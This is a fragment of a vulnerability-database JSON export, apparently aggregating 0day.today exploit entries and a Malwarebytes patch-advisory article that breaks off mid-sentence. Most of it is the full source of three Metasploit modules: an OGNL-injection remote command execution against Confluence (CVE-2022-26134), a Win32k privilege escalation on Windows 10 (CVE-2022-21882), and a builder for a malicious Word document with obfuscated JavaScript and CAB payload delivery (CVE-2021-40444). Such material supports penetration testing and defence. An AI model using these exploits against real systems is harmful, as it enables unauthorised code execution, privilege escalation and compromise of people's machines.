"65AEB692-CDF9-53FB-B13F-CAB5A4288606", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "zdt": [{"lastseen": "2023-08-12T01:18:07", "description": "This Metasploit module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to evaluate an OGNL expression resulting in OS command execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-09T00:00:00", "type": "zdt", "title": "Atlassian Confluence Namespace OGNL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2022-26134"], "modified": "2022-06-09T00:00:00", "id": "1337DAY-ID-37781", "href": "https://0day.today/exploit/description/37781", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Atlassian Confluence Namespace OGNL Injection',\n 'Description' => %q{\n This module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to\n evaluate an OGNL expression resulting in OS command execution.\n },\n 'Author' => [\n 'Unknown', # exploited in the wild\n 'bturner-r7',\n 'jbaines-r7',\n 'Spencer McIntyre'\n ],\n 'References' => [\n ['CVE', '2021-26084'],\n ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro'],\n ['URL', 'https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py'],\n ['URL', 'https://github.com/jbaines-r7/through_the_wire'],\n ['URL', 'https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis']\n ],\n 'DisclosureDate' => '2022-06-02',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 8090\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n version = get_confluence_version\n return CheckCode::Unknown unless version\n\n vprint_status(\"Detected Confluence version: #{version}\")\n header = \"X-#{Rex::Text.rand_text_alphanumeric(10..15)}\"\n res = inject_ognl('', header: header) # empty command works for testing, the header will be set\n\n return CheckCode::Unknown unless res\n\n unless res && res.headers.include?(header)\n return CheckCode::Safe('Failed to test OGNL injection.')\n end\n\n CheckCode::Vulnerable('Successfully tested OGNL injection.')\n end\n\n def get_confluence_version\n return @confluence_version if @confluence_version\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'login.action')\n )\n return nil unless res&.code == 200\n\n poweredby = res.get_xml_document.xpath('//ul[@id=\"poweredby\"]/li[@class=\"print-only\"]/text()').first&.text\n return nil unless poweredby =~ /Confluence (\\d+(\\.\\d+)*)/\n\n @confluence_version = Rex::Version.new(Regexp.last_match(1))\n @confluence_version\n end\n\n def exploit\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :cmd\n execute_command(payload.encoded)\n when :dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n header = \"X-#{Rex::Text.rand_text_alphanumeric(10..15)}\"\n res = inject_ognl(cmd, header: header)\n\n unless res && res.headers.include?(header)\n fail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\")\n end\n\n vprint_good(\"Successfully executed command: #{cmd}\")\n res.headers[header]\n end\n\n def inject_ognl(cmd, header:)\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, Rex::Text.uri_encode(ognl_payload(cmd, header: header)), 'dashboard.action'),\n 'headers' => { header => cmd }\n )\n end\n\n def ognl_payload(_cmd, header:)\n <<~OGNL.gsub(/^\\s+/, '').tr(\"\\n\", '')\n ${\n Class.forName(\"com.opensymphony.webwork.ServletActionContext\")\n .getMethod(\"getResponse\",null)\n .invoke(null,null)\n .setHeader(\"#{header}\",\n Class.forName(\"javax.script.ScriptEngineManager\")\n .newInstance()\n .getEngineByName(\"js\")\n .eval(\"java.lang.Runtime.getRuntime().exec([\n #{target['Platform'] == 'win' ? \"'cmd.exe','/c'\" : \"'/bin/sh','-c'\"},\n com.opensymphony.webwork.ServletActionContext.getRequest().getHeader('#{header}')\n ]); '#{Faker::Internet.uuid}'\")\n )\n }\n OGNL\n end\nend\n", "sourceHref": "https://0day.today/exploit/37781", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T15:28:01", "description": "A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of NT AUTHORITY\\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to achieve an out of bounds write operation, eventually leading to privilege escalation. This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021. In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to function on a wider range of Windows 10 targets.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-28T00:00:00", "type": "zdt", "title": "Win32k ConsoleControl Offset Confusion / Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255", "CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-02-28T00:00:00", "id": "1337DAY-ID-37433", "href": "https://0day.today/exploit/description/37433", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = AverageRanking\n\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::ReflectiveDLLInjection\n prepend Msf::Exploit::Remote::AutoCheck\n\n include Msf::Exploit::Deprecated\n moved_from 'exploit/windows/local/cve_2021_1732_win32k'\n\n def initialize(info = {})\n super(\n update_info(\n info,\n {\n 'Name' => 'Win32k ConsoleControl Offset Confusion',\n 'Description' => %q{\n A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of\n NT AUTHORITY\\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being\n treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to\n achieve an out of bounds write operation, eventually leading to privilege escalation.\n\n This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021.\n In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is\n is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to\n function on a wider range of Windows 10 targets.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n # CVE-2021-1732\n 'BITTER APT', # exploit as used in the wild\n 'JinQuan', # detailed analysis\n 'MaDongZe', # detailed analysis\n 'TuXiaoYi', # detailed analysis\n 'LiHao', # detailed analysis\n # CVE-2022-21882\n 'L4ys', # github poc\n # both CVEs\n 'KaLendsi', # github pocs\n # Metasploit exploit\n 'Spencer McIntyre' # metasploit module\n ],\n 'Arch' => [ ARCH_X64 ],\n 'Platform' => 'win',\n 'SessionTypes' => [ 'meterpreter' ],\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread'\n },\n 'Targets' => [\n [ 'Windows 10 v1803-21H2 x64', { 'Arch' => ARCH_X64 } ]\n ],\n 'Payload' => {\n 'DisableNops' => true\n },\n 'References' => [\n # CVE-2021-1732 references\n [ 'CVE', '2021-1732' ],\n [ 'URL', 'https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/' ],\n [ 'URL', 'https://github.com/KaLendsi/CVE-2021-1732-Exploit' ],\n [ 'URL', 'https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e' ],\n [ 'URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732' ],\n # the rest are not cve-2021-1732 specific but are on topic regarding the techniques used within the exploit\n [ 'URL', 'https://www.fuzzysecurity.com/tutorials/expDev/22.html' ],\n [ 'URL', 'https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm' ],\n [ 'URL', 'https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html' ],\n [ 'URL', 'https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html' ],\n # CVE-2022-21882 references\n [ 'CVE', '2022-21882' ],\n [ 'URL', 'https://github.com/L4ys/CVE-2022-21882' ],\n [ 'URL', 'https://github.com/KaLendsi/CVE-2022-21882' ]\n ],\n 'DisclosureDate' => '2021-02-09', # CVE-2021-1732 disclosure date\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [ CRASH_OS_RESTARTS, ],\n 'Reliability' => [ REPEATABLE_SESSION, ],\n 'SideEffects' => []\n }\n }\n )\n )\n end\n\n def check\n sysinfo_value = sysinfo['OS']\n\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return Exploit::CheckCode::Safe\n end\n\n build_num = sysinfo_value.match(/\\w+\\d+\\w+(\\d+)/)[0].to_i\n vprint_status(\"Windows Build Number = #{build_num}\")\n\n unless sysinfo_value =~ /10/ && (build_num >= 17134 && build_num <= 19044)\n print_error('The exploit only supports Windows 10 versions 1803 - 21H2')\n return CheckCode::Safe\n end\n\n CheckCode::Appears\n end\n\n def exploit\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n\n if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86\n fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')\n elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86\n fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')\n elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64\n fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')\n end\n\n encoded_payload = payload.encoded\n execute_dll(\n ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-21882', 'CVE-2022-21882.x64.dll'),\n [encoded_payload.length].pack('I<') + encoded_payload\n )\n\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n end\nend\n", "sourceHref": "https://0day.today/exploit/37433", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-25T08:45:40", "description": "This Metasploit module creates a malicious docx file that when opened in Word on a vulnerable Windows system will lead to code execution. This vulnerability exists because an attacker can craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-12-09T00:00:00", "type": "zdt", "title": "Microsoft Office Word MSHTML Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-09T00:00:00", "id": "1337DAY-ID-37126", "href": "https://0day.today/exploit/description/37126", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Office Word Malicious MSHTML RCE',\n 'Description' => %q{\n This module creates a malicious docx file that when opened in Word on a vulnerable Windows\n system will lead to code execution. This vulnerability exists because an attacker can\n craft a malicious ActiveX control to be used by a Microsoft Office document that hosts\n the browser rendering engine.\n },\n 'References' => [\n ['CVE', '2021-40444'],\n ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444'],\n ['URL', 'https://www.sentinelone.com/blog/peeking-into-cve-2021-40444-ms-office-zero-day-vulnerability-exploited-in-the-wild/'],\n ['URL', 'http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf'],\n ['URL', 'https://github.com/lockedbyte/CVE-2021-40444/blob/master/REPRODUCE.md'],\n ['URL', 'https://github.com/klezVirus/CVE-2021-40444']\n ],\n 'Author' => [\n 'lockedbyte ', # Vulnerability discovery.\n 'klezVirus ', # References and PoC.\n 'thesunRider', # Official Metasploit module.\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Zeop-CyberSecurity - code base contribution and refactoring.\n ],\n 'DisclosureDate' => '2021-09-23',\n 'License' => MSF_LICENSE,\n 'Privileged' => false,\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'Payload' => {\n 'DisableNops' => true\n },\n 'DefaultOptions' => {\n 'FILENAME' => 'msf.docx'\n },\n 'Targets' => [\n [\n 'Hosted', {}\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [UNRELIABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptBool.new('OBFUSCATE', [true, 'Obfuscate JavaScript content.', true])\n ])\n register_advanced_options([\n OptPath.new('DocxTemplate', [ false, 'A DOCX file that will be used as a template to build the exploit.' ]),\n ])\n end\n\n def bin_to_hex(bstr)\n return(bstr.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join)\n end\n\n def cab_checksum(data, seed = \"\\x00\\x00\\x00\\x00\")\n checksum = seed\n\n bytes = ''\n data.chars.each_slice(4).map(&:join).each do |dword|\n if dword.length == 4\n checksum = checksum.unpack('C*').zip(dword.unpack('C*')).map { |a, b| a ^ b }.pack('C*')\n else\n bytes = dword\n end\n end\n checksum = checksum.reverse\n\n case (data.length % 4)\n when 3\n dword = \"\\x00#{bytes}\"\n when 2\n dword = \"\\x00\\x00#{bytes}\"\n when 1\n dword = \"\\x00\\x00\\x00#{bytes}\"\n else\n dword = \"\\x00\\x00\\x00\\x00\"\n end\n\n checksum = checksum.unpack('C*').zip(dword.unpack('C*')).map { |a, b| a ^ b }.pack('C*').reverse\n end\n\n # http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf\n def create_cab(data)\n cab_cfdata = ''\n filename = \"../#{File.basename(@my_resources.first)}.inf\"\n block_size = 32768\n struct_cffile = 0xd\n struct_cfheader = 0x30\n\n block_counter = 0\n data.chars.each_slice(block_size).map(&:join).each do |block|\n block_counter += 1\n\n seed = \"#{[block.length].pack('S')}#{[block.length].pack('S')}\"\n csum = cab_checksum(block, seed)\n\n vprint_status(\"Data block added w/ checksum: #{bin_to_hex(csum)}\")\n cab_cfdata << csum # uint32 {4} - Checksum\n cab_cfdata << [block.length].pack('S') # uint16 {2} - Compressed Data Length\n cab_cfdata << [block.length].pack('S') # uint16 {2} - Uncompressed Data Length\n cab_cfdata << block\n end\n\n cab_size = [\n struct_cfheader +\n struct_cffile +\n filename.length +\n cab_cfdata.length\n ].pack('L<')\n\n # CFHEADER (http://wiki.xentax.com/index.php/Microsoft_Cabinet_CAB)\n cab_header = \"\\x4D\\x53\\x43\\x46\" # uint32 {4} - Header (MSCF)\n cab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Reserved (null)\n cab_header << cab_size # uint32 {4} - Archive Length\n cab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Reserved (null)\n\n cab_header << \"\\x2C\\x00\\x00\\x00\" # uint32 {4} - Offset to the first CFFILE\n cab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Reserved (null)\n cab_header << \"\\x03\" # byte {1} - Minor Version (3)\n cab_header << \"\\x01\" # byte {1} - Major Version (1)\n cab_header << \"\\x01\\x00\" # uint16 {2} - Number of Folders\n cab_header << \"\\x01\\x00\" # uint16 {2} - Number of Files\n cab_header << \"\\x00\\x00\" # uint16 {2} - Flags\n\n cab_header << \"\\xD2\\x04\" # uint16 {2} - Cabinet Set ID Number\n cab_header << \"\\x00\\x00\" # uint16 {2} - Sequential Number of this Cabinet file in a Set\n\n # CFFOLDER\n cab_header << [ # uint32 {4} - Offset to the first CFDATA in this Folder\n struct_cfheader +\n struct_cffile +\n filename.length\n ].pack('L<')\n cab_header << [block_counter].pack('S<') # uint16 {2} - Number of CFDATA blocks in this Folder\n cab_header << \"\\x00\\x00\" # uint16 {2} - Compression Format for each CFDATA in this Folder (1 = MSZIP)\n\n # increase file size to trigger vulnerability\n cab_header << [ # uint32 {4} - Uncompressed File Length (\"\\x02\\x00\\x5C\\x41\")\n data.length + 1073741824\n ].pack('L<')\n\n # set current date and time in the format of cab file\n date_time = Time.new\n date = [((date_time.year - 1980) << 9) + (date_time.month << 5) + date_time.day].pack('S')\n time = [(date_time.hour << 11) + (date_time.min << 5) + (date_time.sec / 2)].pack('S')\n\n # CFFILE\n cab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Offset in the Uncompressed CFDATA for the Folder this file belongs to (relative to the start of the Uncompressed CFDATA for this Folder)\n cab_header << \"\\x00\\x00\" # uint16 {2} - Folder ID (starts at 0)\n cab_header << date # uint16 {2} - File Date (\\x5A\\x53)\n cab_header << time # uint16 {2} - File Time (\\xC3\\x5C)\n cab_header << \"\\x20\\x00\" # uint16 {2} - File Attributes\n cab_header << filename # byte {X} - Filename (ASCII)\n cab_header << \"\\x00\" # byte {1} - null Filename Terminator\n\n cab_stream = cab_header\n\n # CFDATA\n cab_stream << cab_cfdata\n end\n\n def generate_html\n uri = \"#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.cab\"\n inf = \"#{File.basename(@my_resources.first)}.inf\"\n\n file_path = ::File.join(::Msf::Config.data_directory, 'exploits', 'CVE-2021-40444', 'cve_2021_40444.js')\n js_content = ::File.binread(file_path)\n\n js_content.gsub!('REPLACE_INF', inf)\n js_content.gsub!('REPLACE_URI', uri)\n if datastore['OBFUSCATE']\n print_status('Obfuscate JavaScript content')\n\n js_content = Rex::Exploitation::JSObfu.new js_content\n js_content = js_content.obfuscate(memory_sensitive: false)\n end\n\n html = '<!DOCTYPE html><html><head><meta http-equiv=\"Expires\" content=\"-1\"><meta http-equiv=\"X-UA-Compatible\" content=\"IE=11\"></head><body><script>'\n html += js_content.to_s\n html += '</script></body></html>'\n html\n end\n\n def get_file_in_docx(fname)\n i = @docx.find_index { |item| item[:fname] == fname }\n\n unless i\n fail_with(Failure::NotFound, \"This template cannot be used because it is missing: #{fname}\")\n end\n\n @docx.fetch(i)[:data]\n end\n\n def get_template_path\n datastore['DocxTemplate'] || File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-40444', 'cve-2021-40444.docx')\n end\n\n def inject_docx\n document_xml = get_file_in_docx('word/document.xml')\n unless document_xml\n fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/document.xml')\n end\n\n document_xml_rels = get_file_in_docx('word/_rels/document.xml.rels')\n unless document_xml_rels\n fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/_rels/document.xml.rels')\n end\n\n uri = \"#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html\"\n @docx.each do |entry|\n case entry[:fname]\n when 'word/document.xml'\n entry[:data] = document_xml.to_s.gsub!('TARGET_HERE', uri.to_s)\n when 'word/_rels/document.xml.rels'\n entry[:data] = document_xml_rels.to_s.gsub!('TARGET_HERE', \"mhtml:#{uri}!x-usc:#{uri}\")\n end\n end\n end\n\n def normalize_uri(*strs)\n new_str = strs * '/'\n\n new_str = new_str.gsub!('//', '/') while new_str.index('//')\n\n # makes sure there's a starting slash\n unless new_str[0, 1] == '/'\n new_str = '/' + new_str\n end\n\n new_str\n end\n\n def on_request_uri(cli, request)\n header_cab = {\n 'Access-Control-Allow-Origin' => '*',\n 'Access-Control-Allow-Methods' => 'GET, POST, OPTIONS',\n 'Cache-Control' => 'no-store, no-cache, must-revalidate',\n 'Content-Type' => 'application/octet-stream',\n 'Content-Disposition' => \"attachment; filename=#{File.basename(@my_resources.first)}.cab\"\n }\n\n header_html = {\n 'Access-Control-Allow-Origin' => '*',\n 'Access-Control-Allow-Methods' => 'GET, POST',\n 'Cache-Control' => 'no-store, no-cache, must-revalidate',\n 'Content-Type' => 'text/html; charset=UTF-8'\n }\n\n if request.method.eql? 'HEAD'\n if request.raw_uri.to_s.end_with? '.cab'\n send_response(cli, '', header_cab)\n else\n send_response(cli, '', header_html)\n end\n elsif request.method.eql? 'OPTIONS'\n response = create_response(501, 'Unsupported Method')\n response['Content-Type'] = 'text/html'\n response.body = ''\n\n cli.send_response(response)\n elsif request.raw_uri.to_s.end_with? '.html'\n print_status('Sending HTML Payload')\n\n send_response_html(cli, generate_html, header_html)\n elsif request.raw_uri.to_s.end_with? '.cab'\n print_status('Sending CAB Payload')\n\n send_response(cli, create_cab(@dll_payload), header_cab)\n end\n end\n\n def pack_docx\n @docx.each do |entry|\n if entry[:data].is_a?(Nokogiri::XML::Document)\n entry[:data] = entry[:data].to_s\n end\n end\n\n Msf::Util::EXE.to_zip(@docx)\n end\n\n def unpack_docx(template_path)\n document = []\n\n Zip::File.open(template_path) do |entries|\n entries.each do |entry|\n if entry.name.match(/\\.xml|\\.rels$/i)\n content = Nokogiri::XML(entry.get_input_stream.read) if entry.file?\n elsif entry.file?\n content = entry.get_input_stream.read\n end\n\n vprint_status(\"Parsing item from template: #{entry.name}\")\n\n document << { fname: entry.name, data: content }\n end\n end\n\n document\n end\n\n def primer\n print_status('CVE-2021-40444: Generate a malicious docx file')\n\n @proto = (datastore['SSL'] ? 'https' : 'http')\n if datastore['SRVHOST'] == '0.0.0.0'\n datastore['SRVHOST'] = Rex::Socket.source_address\n end\n\n template_path = get_template_path\n unless File.extname(template_path).match(/\\.docx$/i)\n fail_with(Failure::BadConfig, 'Template is not a docx file!')\n end\n\n print_status(\"Using template '#{template_path}'\")\n @docx = unpack_docx(template_path)\n\n print_status('Injecting payload in docx document')\n inject_docx\n\n print_status(\"Finalizing docx '#{datastore['FILENAME']}'\")\n file_create(pack_docx)\n\n @dll_payload = Msf::Util::EXE.to_win64pe_dll(\n framework,\n payload.encoded,\n {\n arch: payload.arch.first,\n mixed_mode: true,\n platform: 'win'\n }\n )\n end\nend\n", "sourceHref": "https://0day.today/exploit/37126", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2022-02-10T00:00:00", "description": "If you\u2019re running Windows 10, it\u2019s time to stop delaying those patches and bring your systems up to date as soon as possible.\n\nBleeping Computer [reports](<https://www.bleepingcomputer.com/news/microsoft/windows-vulnerability-with-new-public-exploits-lets-you-become-admin/>) that a researcher has come up with a bypass for an older bug, which could serve up some major headaches if left to fester. Those headaches will take the form of unauthorised admin privileges in Windows 10, alongside creating new admin accounts and more besides.\n\n## What happened the first time round?\n\nBack in 2021, Microsoft patched an exploit which had [been in use](<https://www.bleepingcomputer.com/news/security/recently-fixed-windows-zero-day-actively-exploited-since-mid-2020/>) since mid-2020. Classed as \u201chigh-severity\u201d, \u201cCVE-2021-1732 - Windows Win32k Elevation of Privilege Vulnerability\u201d allowed attackers to elevate privileges to admin level.\n\nFooling potential victims by having them open bogus email attachments is all it would take to get one foot in the door via code execution. It popped up in a [targeted attack](<https://ti.dbappsecurity.com.cn/blog/articles/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/>) related to the [Bitter APT](<https://www.forbes.com/sites/thomasbrewster/2021/09/17/exodus-american-tech-helped-india-spy-on-china>) campaign. According to the report, numbers were \u201cvery limited\u201d and struck victims in China.\n\n## What\u2019s happening now?\n\nMultiple exploits have dropped for another elevation of privilege vulnerability known as [CVE-2022-21882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21882>). This is a bypass for the previously mentioned [CVE-2021-1732](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732>) which was fixed back in February 2021. CVE-2022-21882 was fixed by Microsoft via updates from January 2022. However, sys admins out there may well have skipped the updates due to [various bugs](<https://www.bleepingcomputer.com/news/microsoft/new-windows-server-updates-cause-dc-boot-loops-break-hyper-v/>) which came along for the update ride.\n\n## Time to get fixing things?\n\nIt is absolutely time to get fixing things. The exploit is now out there in the wild, and as Bleeping Computer notes, it \u201caffects all supported support versions of Windows 10 before the January 2022 Patch Tuesday updates\u201d. \n\nWriters at Bleeping Computer were able to get it to work in testing, and others have confirmed it for themselves:\n\n> Interestingly, [#MDE](<https://twitter.com/hashtag/MDE?src=hash&ref_src=twsrc%5Etfw>) detects this PoC as CVE-2021-1732. \nThis is understandable since this [#CVE](<https://twitter.com/hashtag/CVE?src=hash&ref_src=twsrc%5Etfw>)-2022-21882 is a bypass of [#CVE](<https://twitter.com/hashtag/CVE?src=hash&ref_src=twsrc%5Etfw>)-2021-1732. \nGeneric [#LPE](<https://twitter.com/hashtag/LPE?src=hash&ref_src=twsrc%5Etfw>) detection [#KQL](<https://twitter.com/hashtag/KQL?src=hash&ref_src=twsrc%5Etfw>) query works in this case too.[#BlueTeam](<https://twitter.com/hashtag/BlueTeam?src=hash&ref_src=twsrc%5Etfw>) [#ThreatHunting](<https://twitter.com/hashtag/ThreatHunting?src=hash&ref_src=twsrc%5Etfw>)<https://t.co/01El9wPjk0> \n/1 <https://t.co/vM2apKJsI6>\n> \n> -- Bhabesh (@bh4b3sh) [January 29, 2022](<https://twitter.com/bh4b3sh/status/1487449316117516288?ref_src=twsrc%5Etfw>)\n\n## Is there any reason to wait for February\u2019s Patch Tuesday?\n\nIf you\u2019re one of the hold-outs who ran into errors last time around, waiting isn\u2019t advisable. Microsoft already issued an [OOB (out of band) update](<https://www.theverge.com/2022/1/18/22889670/microsoft-windows-server-update-vpn-refs-domain-patch>) to address the multiple errors caused by the January patch. As per Microsoft\u2019s January 17th [notification about the release](<https://docs.microsoft.com/en-us/windows/release-health/windows-message-center#2777>):\n\n> &quot;Microsoft is releasing Out-of-band (OOB) updates today, 